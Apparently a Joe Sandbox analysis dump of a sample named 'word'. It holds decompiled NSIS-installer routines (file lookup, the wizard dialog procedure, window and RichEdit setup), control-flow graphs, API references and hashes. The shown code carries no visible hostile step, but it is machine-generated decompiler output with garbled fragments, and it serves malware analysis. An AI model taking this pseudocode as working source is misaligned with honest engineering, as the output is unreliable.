                                      				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                      				if(_t2 == 0xffffffff) {
                                      					return 0;
                                      				}
                                      				FindClose(_t2);
                                      				return 0x426798;
                                      			}




                                      0x004069a9
                                      0x004069b2
                                      0x00000000
                                      0x004069bf
                                      0x004069b5
                                      0x00000000

                                      APIs
                                      • FindFirstFileW.KERNELBASE(7556D4C4,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004069A9
                                      • FindClose.KERNEL32(00000000), ref: 004069B5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                      • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                      • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                      • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 146->145 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                      C-Code - Quality: 84%
                                      			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                      				struct HWND__* _v28;
                                      				void* _v84;
                                      				void* _v88;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t34;
                                      				signed int _t36;
                                      				signed int _t38;
                                      				struct HWND__* _t48;
                                      				signed int _t67;
                                      				struct HWND__* _t73;
                                      				signed int _t86;
                                      				struct HWND__* _t91;
                                      				signed int _t99;
                                      				int _t103;
                                      				signed int _t117;
                                      				int _t118;
                                      				int _t122;
                                      				signed int _t124;
                                      				struct HWND__* _t127;
                                      				struct HWND__* _t128;
                                      				int _t129;
                                      				intOrPtr _t130;
                                      				long _t133;
                                      				int _t135;
                                      				int _t136;
                                      				void* _t137;
                                      				void* _t145;
                                      
                                      				_t130 = _a8;
                                      				if(_t130 == 0x110 || _t130 == 0x408) {
                                      					_t34 = _a12;
                                      					_t127 = _a4;
                                      					__eflags = _t130 - 0x110;
                                      					 *0x423730 = _t34;
                                      					if(_t130 == 0x110) {
                                      						 *0x42a268 = _t127;
                                      						 *0x423744 = GetDlgItem(_t127, 1);
                                      						_t91 = GetDlgItem(_t127, 2);
                                      						_push(0xffffffff);
                                      						_push(0x1c);
                                      						 *0x421710 = _t91;
                                      						E004045C4(_t127);
                                      						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
                                      						 *0x42922c = E0040140B(4);
                                      						_t34 = 1;
                                      						__eflags = 1;
                                      						 *0x423730 = 1;
                                      					}
                                      					_t124 =  *0x40a39c; // 0x0
                                      					_t136 = 0;
                                      					_t133 = (_t124 << 6) +  *0x42a280;
                                      					__eflags = _t124;
                                      					if(_t124 < 0) {
                                      						L36:
                                      						E00404610(0x40b);
                                      						while(1) {
                                      							_t36 =  *0x423730;
                                      							 *0x40a39c =  *0x40a39c + _t36;
                                      							_t133 = _t133 + (_t36 << 6);
                                      							_t38 =  *0x40a39c; // 0x0
                                      							__eflags = _t38 -  *0x42a284;
                                      							if(_t38 ==  *0x42a284) {
                                      								E0040140B(1);
                                      							}
                                      							__eflags =  *0x42922c - _t136;
                                      							if( *0x42922c != _t136) {
                                      								break;
                                      							}
                                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                      							if(__eflags >= 0) {
                                      								break;
                                      							}
                                      							_t117 =  *(_t133 + 0x14);
                                      							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                      							_push(0xfffffc19);
                                      							E004045C4(_t127);
                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                      							_push(0xfffffc1b);
                                      							E004045C4(_t127);
                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                      							_push(0xfffffc1a);
                                      							E004045C4(_t127);
                                      							_t48 = GetDlgItem(_t127, 3);
                                      							__eflags =  *0x42a2ec - _t136;
                                      							_v28 = _t48;
                                      							if( *0x42a2ec != _t136) {
                                      								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                      								__eflags = _t117;
                                      							}
                                      							ShowWindow(_t48, _t117 & 0x00000008);
                                      							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                      							E004045E6(_t117 & 0x00000002);
                                      							_t118 = _t117 & 0x00000004;
                                      							EnableWindow( *0x421710, _t118);
                                      							__eflags = _t118 - _t136;
                                      							if(_t118 == _t136) {
                                      								_push(1);
                                      							} else {
                                      								_push(_t136);
                                      							}
                                      							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                      							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                      							__eflags =  *0x42a2ec - _t136;
                                      							if( *0x42a2ec == _t136) {
                                      								_push( *0x423744);
                                      							} else {
                                      								SendMessageW(_t127, 0x401, 2, _t136);
                                      								_push( *0x421710);
                                      							}
                                      							E004045F9();
                                      							E00406668(0x423748, E004040A6());
                                      							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                      							SetWindowTextW(_t127, 0x423748);
                                      							_push(_t136);
                                      							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                      							__eflags = _t67;
                                      							if(_t67 != 0) {
                                      								continue;
                                      							} else {
                                      								__eflags =  *_t133 - _t136;
                                      								if( *_t133 == _t136) {
                                      									continue;
                                      								}
                                      								__eflags =  *(_t133 + 4) - 5;
                                      								if( *(_t133 + 4) != 5) {
                                      									DestroyWindow( *0x429238);
                                      									 *0x422720 = _t133;
                                      									__eflags =  *_t133 - _t136;
                                      									if( *_t133 <= _t136) {
                                      										goto L60;
                                      									}
                                      									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                      									__eflags = _t73 - _t136;
                                      									 *0x429238 = _t73;
                                      									if(_t73 == _t136) {
                                      										goto L60;
                                      									}
                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                      									_push(6);
                                      									E004045C4(_t73);
                                      									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                      									ScreenToClient(_t127, _t137 + 0x10);
                                      									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                      									_push(_t136);
                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                      									__eflags =  *0x42922c - _t136;
                                      									if( *0x42922c != _t136) {
                                      										goto L63;
                                      									}
                                      									ShowWindow( *0x429238, 8);
                                      									E00404610(0x405);
                                      									goto L60;
                                      								}
                                      								__eflags =  *0x42a2ec - _t136;
                                      								if( *0x42a2ec != _t136) {
                                      									goto L63;
                                      								}
                                      								__eflags =  *0x42a2e0 - _t136;
                                      								if( *0x42a2e0 != _t136) {
                                      									continue;
                                      								}
                                      								goto L63;
                                      							}
                                      						}
                                      						DestroyWindow( *0x429238); // executed
                                      						 *0x42a268 = _t136;
                                      						EndDialog(_t127,  *0x421f18);
                                      						goto L60;
                                      					} else {
                                      						__eflags = _t34 - 1;
                                      						if(_t34 != 1) {
                                      							L35:
                                      							__eflags =  *_t133 - _t136;
                                      							if( *_t133 == _t136) {
                                      								goto L63;
                                      							}
                                      							goto L36;
                                      						}
                                      						_push(0);
                                      						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                      						__eflags = _t86;
                                      						if(_t86 == 0) {
                                      							goto L35;
                                      						}
                                      						SendMessageW( *0x429238, 0x40f, 0, 1);
                                      						__eflags =  *0x42922c;
                                      						return 0 |  *0x42922c == 0x00000000;
                                      					}
                                      				} else {
                                      					_t127 = _a4;
                                      					_t136 = 0;
                                      					if(_t130 == 0x47) {
                                      						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                      					}
                                      					_t122 = _a12;
                                      					if(_t130 != 5) {
                                      						L8:
                                      						if(_t130 != 0x40d) {
                                      							__eflags = _t130 - 0x11;
                                      							if(_t130 != 0x11) {
                                      								__eflags = _t130 - 0x111;
                                      								if(_t130 != 0x111) {
                                      									goto L28;
                                      								}
                                      								_t135 = _t122 & 0x0000ffff;
                                      								_t128 = GetDlgItem(_t127, _t135);
                                      								__eflags = _t128 - _t136;
                                      								if(_t128 == _t136) {
                                      									L15:
                                      									__eflags = _t135 - 1;
                                      									if(_t135 != 1) {
                                      										__eflags = _t135 - 3;
                                      										if(_t135 != 3) {
                                      											_t129 = 2;
                                      											__eflags = _t135 - _t129;
                                      											if(_t135 != _t129) {
                                      												L27:
                                      												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                      												goto L28;
                                      											}
                                      											__eflags =  *0x42a2ec - _t136;
                                      											if( *0x42a2ec == _t136) {
                                      												_t99 = E0040140B(3);
                                      												__eflags = _t99;
                                      												if(_t99 != 0) {
                                      													goto L28;
                                      												}
                                      												 *0x421f18 = 1;
                                      												L23:
                                      												_push(0x78);
                                      												L24:
                                      												E0040459D();
                                      												goto L28;
                                      											}
                                      											E0040140B(_t129);
                                      											 *0x421f18 = _t129;
                                      											goto L23;
                                      										}
                                      										__eflags =  *0x40a39c - _t136; // 0x0
                                      										if(__eflags <= 0) {
                                      											goto L27;
                                      										}
                                      										_push(0xffffffff);
                                      										goto L24;
                                      									}
                                      									_push(_t135);
                                      									goto L24;
                                      								}
                                      								SendMessageW(_t128, 0xf3, _t136, _t136);
                                      								_t103 = IsWindowEnabled(_t128);
                                      								__eflags = _t103;
                                      								if(_t103 == 0) {
                                      									L63:
                                      									return 0;
                                      								}
                                      								goto L15;
                                      							}
                                      							SetWindowLongW(_t127, _t136, _t136);
                                      							return 1;
                                      						}
                                      						DestroyWindow( *0x429238);
                                      						 *0x429238 = _t122;
                                      						L60:
                                      						_t145 =  *0x425748 - _t136; // 0x0
                                      						if(_t145 == 0 &&  *0x429238 != _t136) {
                                      							ShowWindow(_t127, 0xa);
                                      							 *0x425748 = 1;
                                      						}
                                      						goto L63;
                                      					} else {
                                      						asm("sbb eax, eax");
                                      						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                      						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                      							L28:
                                      							return E0040462B(_a8, _t122, _a16);
                                      						} else {
                                      							ShowWindow(_t127, 4);
                                      							goto L8;
                                      						}
                                      					}
                                      				}
                                      			}
































                                      0x004040d0
                                      0x004040d7
                                      0x0040423e
                                      0x00404242
                                      0x00404246
                                      0x00404248
                                      0x0040424d
                                      0x00404258
                                      0x00404263
                                      0x00404268
                                      0x0040426a
                                      0x0040426c
                                      0x0040426f
                                      0x00404274
                                      0x00404282
                                      0x0040428f
                                      0x00404296
                                      0x00404296
                                      0x00404297
                                      0x00404297
                                      0x0040429c
                                      0x004042a2
                                      0x004042a9
                                      0x004042af
                                      0x004042b1
                                      0x004042f1
                                      0x004042f6
                                      0x004042fb
                                      0x004042fb
                                      0x00404300
                                      0x00404309
                                      0x0040430b
                                      0x00404310
                                      0x00404316
                                      0x0040431a
                                      0x0040431a
                                      0x0040431f
                                      0x00404325
                                      0x00000000
                                      0x00000000
                                      0x00404330
                                      0x00404336
                                      0x00000000
                                      0x00000000
                                      0x0040433f
                                      0x00404347
                                      0x0040434c
                                      0x0040434f
                                      0x00404355
                                      0x0040435a
                                      0x0040435d
                                      0x00404363
                                      0x00404368
                                      0x0040436b
                                      0x00404371
                                      0x00404379
                                      0x0040437f
                                      0x00404385
                                      0x00404389
                                      0x00404390
                                      0x00404390
                                      0x00404390
                                      0x0040439a
                                      0x004043ac
                                      0x004043b8
                                      0x004043bd
                                      0x004043c7
                                      0x004043cd
                                      0x004043cf
                                      0x004043d4
                                      0x004043d1
                                      0x004043d1
                                      0x004043d1
                                      0x004043e4
                                      0x004043fc
                                      0x004043fe
                                      0x00404404
                                      0x00404419
                                      0x00404406
                                      0x0040440f
                                      0x00404411
                                      0x00404411
                                      0x0040441f
                                      0x00404430
                                      0x00404446
                                      0x0040444d
                                      0x00404453
                                      0x00404457
                                      0x0040445c
                                      0x0040445e
                                      0x00000000
                                      0x00404464
                                      0x00404464
                                      0x00404466
                                      0x00000000
                                      0x00000000
                                      0x0040446c
                                      0x00404470
                                      0x00404495
                                      0x0040449b
                                      0x004044a1
                                      0x004044a3
                                      0x00000000
                                      0x00000000
                                      0x004044c9
                                      0x004044cf
                                      0x004044d1
                                      0x004044d6
                                      0x00000000
                                      0x00000000
                                      0x004044dc
                                      0x004044df
                                      0x004044e2
                                      0x004044f9
                                      0x00404505
                                      0x0040451e
                                      0x00404524
                                      0x00404528
                                      0x0040452d
                                      0x00404533
                                      0x00000000
                                      0x00000000
                                      0x0040453d
                                      0x00404548
                                      0x00000000
                                      0x00404548
                                      0x00404472
                                      0x00404478
                                      0x00000000
                                      0x00000000
                                      0x0040447e
                                      0x00404484
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040448a
                                      0x0040445e
                                      0x00404555
                                      0x00404561
                                      0x00404568
                                      0x00000000
                                      0x004042b3
                                      0x004042b3
                                      0x004042b6
                                      0x004042e9
                                      0x004042e9
                                      0x004042eb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004042eb
                                      0x004042b8
                                      0x004042bc
                                      0x004042c1
                                      0x004042c3
                                      0x00000000
                                      0x00000000
                                      0x004042d3
                                      0x004042db
                                      0x00000000
                                      0x004042e1
                                      0x004040e9
                                      0x004040e9
                                      0x004040ed
                                      0x004040f2
                                      0x00404101
                                      0x00404101
                                      0x00404107
                                      0x0040410e
                                      0x00404152
                                      0x00404158
                                      0x00404171
                                      0x00404174
                                      0x00404187
                                      0x0040418d
                                      0x00000000
                                      0x00000000
                                      0x00404193
                                      0x0040419e
                                      0x004041a0
                                      0x004041a2
                                      0x004041c1
                                      0x004041c1
                                      0x004041c4
                                      0x004041c9
                                      0x004041cc
                                      0x004041dc
                                      0x004041dd
                                      0x004041df
                                      0x00404215
                                      0x00404225
                                      0x00000000
                                      0x00404225
                                      0x004041e1
                                      0x004041e7
                                      0x00404200
                                      0x00404205
                                      0x00404207
                                      0x00000000
                                      0x00000000
                                      0x00404209
                                      0x004041f5
                                      0x004041f5
                                      0x004041f7
                                      0x004041f7
                                      0x00000000
                                      0x004041f7
                                      0x004041ea
                                      0x004041ef
                                      0x00000000
                                      0x004041ef
                                      0x004041ce
                                      0x004041d4
                                      0x00000000
                                      0x00000000
                                      0x004041d6
                                      0x00000000
                                      0x004041d6
                                      0x004041c6
                                      0x00000000
                                      0x004041c6
                                      0x004041ac
                                      0x004041b3
                                      0x004041b9
                                      0x004041bb
                                      0x00404591
                                      0x00000000
                                      0x00404591
                                      0x00000000
                                      0x004041bb
                                      0x00404179
                                      0x00000000
                                      0x00404181
                                      0x00404160
                                      0x00404166
                                      0x0040456e
                                      0x0040456e
                                      0x00404574
                                      0x00404581
                                      0x00404587
                                      0x00404587
                                      0x00000000
                                      0x00404110
                                      0x00404115
                                      0x00404121
                                      0x0040412a
                                      0x0040422b
                                      0x00000000
                                      0x00404149
                                      0x0040414c
                                      0x00000000
                                      0x0040414c
                                      0x0040412a
                                      0x0040410e

                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                      • ShowWindow.USER32(?), ref: 00404121
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                      • ShowWindow.USER32(?,00000004), ref: 0040414C
                                      • DestroyWindow.USER32 ref: 00404160
                                      • SetWindowLongW.USER32 ref: 00404179
                                      • GetDlgItem.USER32(?,?), ref: 00404198
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                      • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                      • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                      • GetDlgItem.USER32(?,00000002), ref: 00404268
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                      • GetDlgItem.USER32(?,00000003), ref: 00404379
                                      • ShowWindow.USER32(00000000,?), ref: 0040439A
                                      • EnableWindow.USER32(?,?), ref: 004043AC
                                      • EnableWindow.USER32(?,?), ref: 004043C7
                                      • GetSystemMenu.USER32 ref: 004043DD
                                      • EnableMenuItem.USER32 ref: 004043E4
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                      • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                      • SetWindowTextW.USER32 ref: 0040444D
                                      • ShowWindow.USER32(?,0000000A), ref: 00404581
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                      • String ID: H7B
                                      • API String ID: 1860320154-2300413410
                                      • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                      • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                      • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                      • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                      C-Code - Quality: 96%
                                      			E00403D17(void* __eflags) {
                                      				intOrPtr _v4;
                                      				intOrPtr _v8;
                                      				int _v12;
                                      				void _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr* _t22;
                                      				void* _t30;
                                      				void* _t32;
                                      				int _t33;
                                      				void* _t36;
                                      				int _t39;
                                      				int _t40;
                                      				int _t44;
                                      				short _t63;
                                      				WCHAR* _t65;
                                      				signed char _t69;
                                      				WCHAR* _t76;
                                      				intOrPtr _t82;
                                      				WCHAR* _t87;
                                      
                                      				_t82 =  *0x42a270;
                                      				_t22 = E00406A35(2);
                                      				_t90 = _t22;
                                      				if(_t22 == 0) {
                                      					_t76 = 0x423748;
                                      					L"1033" = 0x30;
                                      					 *0x437002 = 0x78;
                                      					 *0x437004 = 0;
                                      					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                      					__eflags =  *0x423748;
                                      					if(__eflags == 0) {
                                      						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                      					}
                                      					lstrcatW(L"1033", _t76);
                                      				} else {
                                      					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                      				}
                                      				E00403FED(_t78, _t90);
                                      				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                      				 *0x42a2fc = 0x10000;
                                      				if(E0040603F(_t90, 0x435800) != 0) {
                                      					L16:
                                      					if(E0040603F(_t98, 0x435800) == 0) {
                                      						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
                                      					}
                                      					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040);
                                      					 *0x429248 = _t30;
                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                      						L21:
                                      						if(E0040140B(0) == 0) {
                                      							_t32 = E00403FED(_t78, __eflags);
                                      							__eflags =  *0x42a300;
                                      							if( *0x42a300 != 0) {
                                      								_t33 = E0040579D(_t32, 0);
                                      								__eflags = _t33;
                                      								if(_t33 == 0) {
                                      									E0040140B(1);
                                      									goto L33;
                                      								}
                                      								__eflags =  *0x42922c;
                                      								if( *0x42922c == 0) {
                                      									E0040140B(2);
                                      								}
                                      								goto L22;
                                      							}
                                      							ShowWindow( *0x423728, 5); // executed
                                      							_t39 = E004069C5("RichEd20"); // executed
                                      							__eflags = _t39;
                                      							if(_t39 == 0) {
                                      								E004069C5("RichEd32");
                                      							}
                                      							_t87 = L"RichEdit20W";
                                      							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                      							__eflags = _t40;
                                      							if(_t40 == 0) {
                                      								GetClassInfoW(0, L"RichEdit", 0x429200);
                                      								 *0x429224 = _t87;
                                      								RegisterClassW(0x429200);
                                      							}
                                      							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                      							E00403C67(E0040140B(5), 1);
                                      							return _t44;
                                      						}
                                      						L22:
                                      						_t36 = 2;
                                      						return _t36;
                                      					} else {
                                      						_t78 =  *0x42a260;
                                      						 *0x429204 = E00401000;
                                      						 *0x429210 =  *0x42a260;
                                      						 *0x429214 = _t30;
                                      						 *0x429224 = 0x40a3b4;
                                      						if(RegisterClassW(0x429200) == 0) {
                                      							L33:
                                      							__eflags = 0;
                                      							return 0;
                                      						}
                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                      						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                      						goto L21;
                                      					}
                                      				} else {
                                      					_t78 =  *(_t82 + 0x48);
                                      					_t92 = _t78;
                                      					if(_t78 == 0) {
                                      						goto L16;
                                      					}
                                      					_t76 = 0x428200;
                                      					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                      					_t63 =  *0x428200; // 0x22
                                      					if(_t63 == 0) {
                                      						goto L16;
                                      					}
                                      					if(_t63 == 0x22) {
                                      						_t76 = 0x428202;
                                      						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                      					}
                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                      						L15:
                                      						E00406668(0x435800, E00405F37(_t76));
                                      						goto L16;
                                      					} else {
                                      						_t69 = GetFileAttributesW(_t76);
                                      						if(_t69 == 0xffffffff) {
                                      							L14:
                                      							E00405F83(_t76);
                                      							goto L15;
                                      						}
                                      						_t98 = _t69 & 0x00000010;
                                      						if((_t69 & 0x00000010) != 0) {
                                      							goto L15;
                                      						}
                                      						goto L14;
                                      					}
                                      				}
                                      			}
























                                      0x00403d1d
                                      0x00403d26
                                      0x00403d2d
                                      0x00403d2f
                                      0x00403d43
                                      0x00403d55
                                      0x00403d5e
                                      0x00403d67
                                      0x00403d6e
                                      0x00403d73
                                      0x00403d7a
                                      0x00403d8d
                                      0x00403d8d
                                      0x00403d98
